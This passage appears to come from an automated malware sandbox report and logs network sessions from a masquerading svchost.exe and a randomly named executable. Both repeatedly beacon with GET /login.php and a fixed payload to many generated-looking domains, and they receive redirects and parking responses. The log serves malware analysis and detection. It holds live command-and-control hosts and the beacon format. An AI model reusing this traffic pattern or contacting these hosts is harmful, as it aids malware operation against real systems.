...top.location="http://ww1.lysyfyj.com/?fp=ZbSrv2i18YnNfPNSqSsC6n0jQLvcDPBy65hKrYcVeZdyOk55NkMmURDujLfYrzEMz5BE5QmQNeiQHadmY0w%2B%2BVfpeulpAVXGQKGLT8A7T7dz2YpMc1JfB3BKmsZuIwvejkVQz9GfFhNYAH0cBFF4KID2C7M8REwxyw
Aug 23, 2024 18:42:14.001153946 CEST	1236	IN	Data Raw: 32 6a 6b 62 65 38 32 77 74 47 39 68 25 32 46 44 51 79 59 39 35 71 30 75 55 52 50 72 7a 69 78 68 7a 7a 39 65 44 42 42 46 5a 31 45 72 50 30 41 66 69 32 6b 4f 4b 32 31 31 72 47 42 56 4c 74 30 75 79 45 41 63 55 46 52 77 6d 56 54 34 52 52 64 50 76 25 Data Ascii: 2jkbe82wtG9h%2FDQyY95q0uURPrzixhzz9eDBBFZ1ErP0Afi2kOK211rGBVLt0uyEAcUFRwmVT4RRdPv%2F665t09U%2FP9JtApZkkSZ1jnwUZFPfrf5um%2B7w%3D%3D&prvtof=85P%2BvzUaO2GB7ULKjb0pRQ9vWyzI7FnHeQjbVBiQzKs%3D&poru=lL%2FTHaDL0%2BASDNkLUsN%2FTJNHeOzJzHu9wApqlIl41Tk%3
Aug 23, 2024 18:42:14.001163960 CEST	448	IN	Data Raw: 25 32 42 76 7a 55 61 4f 32 47 42 37 55 4c 4b 6a 62 30 70 52 51 39 76 57 79 7a 49 37 46 6e 48 65 51 6a 62 56 42 69 51 7a 4b 73 25 33 44 26 70 6f 72 75 3d 6c 4c 25 32 46 54 48 61 44 4c 30 25 32 42 41 53 44 4e 6b 4c 55 73 4e 25 32 46 54 4a 4e 48 65 Data Ascii: %2BvzUaO2GB7ULKjb0pRQ9vWyzI7FnHeQjbVBiQzKs%3D&poru=lL%2FTHaDL0%2BASDNkLUsN%2FTJNHeOzJzHu9wApqlIl41Tk%3D&_opnslfp=1&"></frameset><noframes><body bgcolor="#ffffff" text="#000000"><a href="http://ww1.lysyfyj.com/?fp=ZbSrv2i18YnNfPNSqSsC
Aug 23, 2024 18:42:14.087893963 CEST	268	IN	Data Raw: 56 4c 74 30 75 79 45 41 63 55 46 52 77 6d 56 54 34 52 52 64 50 76 25 32 46 36 36 35 74 30 39 55 25 32 46 50 39 4a 74 41 70 5a 6b 6b 53 5a 31 6a 6e 77 55 5a 46 50 66 72 66 35 75 6d 25 32 42 37 77 25 33 44 25 33 44 26 70 72 76 74 6f 66 3d 38 35 50 Data Ascii: VLt0uyEAcUFRwmVT4RRdPv%2F665t09U%2FP9JtApZkkSZ1jnwUZFPfrf5um%2B7w%3D%3D&prvtof=85P%2BvzUaO2GB7ULKjb0pRQ9vWyzI7FnHeQjbVBiQzKs%3D&poru=lL%2FTHaDL0%2BASDNkLUsN%2FTJNHeOzJzHu9wApqlIl41Tk%3D&_opnslfp=1&">Click here to proceed</a>.</body></nofr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49722	85.17.31.122	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:15.720752001 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49724	85.17.31.122	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:17.952111959 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49725	172.234.222.143	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:24.310411930 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49728	13.248.169.48	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:25.884602070 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49730	188.114.96.3	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:26.906724930 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:28.454253912 CEST	793	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:42:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://lysyvan.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iod04rfIOdvGJXbdo1dbeUDZror6DvrDt34TtV%2Bo6SajGeDkVtxyYP%2BJXwWc%2F0X8Dqm1ZSNSpceIT3kZkERBom4EX7KooP7R4yUk4F2iiuydAarniPEmWmCIqD%2FBlA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c8e518c1d1a0f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Aug 23, 2024 18:43:00.288718939 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:00.680912018 CEST	795	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:43:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://lysyvan.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g7N1dJaCTWUgm2iPpgCeCLEnBmwPxjAupdhJi0%2BrVrjQCZRSa6NI9SPHray78SReoVaCk0jCQr4%2F%2BGELNexkPQV%2B4AU6BOR32PwKL%2FtGbRCuRkUyzEpalOnCJXmaUw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c8f1f1a2b1a0f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49731	18.208.156.248	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:27.004400015 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:27.546565056 CEST	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:42:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=2defa10e06435b44928a9b853377cfec\|8.46.123.33\|1724431347\|1724431347\|0\|1\|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49733	103.150.11.230	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:27.212459087 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:28.191149950 CEST	403	IN	HTTP/1.1 302 Moved Temporarily Server: openresty/1.15.8.1 Date: Fri, 23 Aug 2024 16:42:28 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive Location: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Aug 23, 2024 18:42:29.307038069 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:29.671279907 CEST	403	IN	HTTP/1.1 302 Moved Temporarily Server: openresty/1.15.8.1 Date: Fri, 23 Aug 2024 16:42:29 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive Location: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49736	106.15.137.66	8001	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:28.202159882 CEST	295	OUT	GET /dh/147287063_637385.html HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: 106.15.137.66:8001 Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:29.305680037 CEST	722	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.3 Date: Fri, 23 Aug 2024 16:42:29 GMT Content-Type: text/html Content-Length: 561 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:42:29.305969000 CEST	321	IN	HTTP/1.1 400 Bad Request Server: openresty/1.21.4.3 Date: Fri, 23 Aug 2024 16:42:29 GMT Content-Type: text/html Content-Length: 163 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.3</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49740	106.15.137.66	8001	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:29.679687977 CEST	295	OUT	GET /dh/147287063_637385.html HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: 106.15.137.66:8001 Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:30.796144009 CEST	1043	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.3 Date: Fri, 23 Aug 2024 16:42:30 GMT Content-Type: text/html Content-Length: 561 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->HTTP/1.1 400 Bad RequestServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:42:30 GMTContent-Type: text/htmlContent-Length: 163Connection: close<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.3</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49741	13.248.169.48	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:36.387193918 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	60684	3.64.163.50	80	4268	C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:46.849085093 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:47.479645014 CEST	689	IN	HTTP/1.1 410 Gone Server: openresty Date: Fri, 23 Aug 2024 16:42:47 GMT Content-Type: text/html Content-Length: 542 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED] Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:42:47.546861887 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:47.735388994 CEST	689	IN	HTTP/1.1 410 Gone Server: openresty Date: Fri, 23 Aug 2024 16:42:47 GMT Content-Type: text/html Content-Length: 542 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED] Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	63517	64.225.91.73	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:06.217880011 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
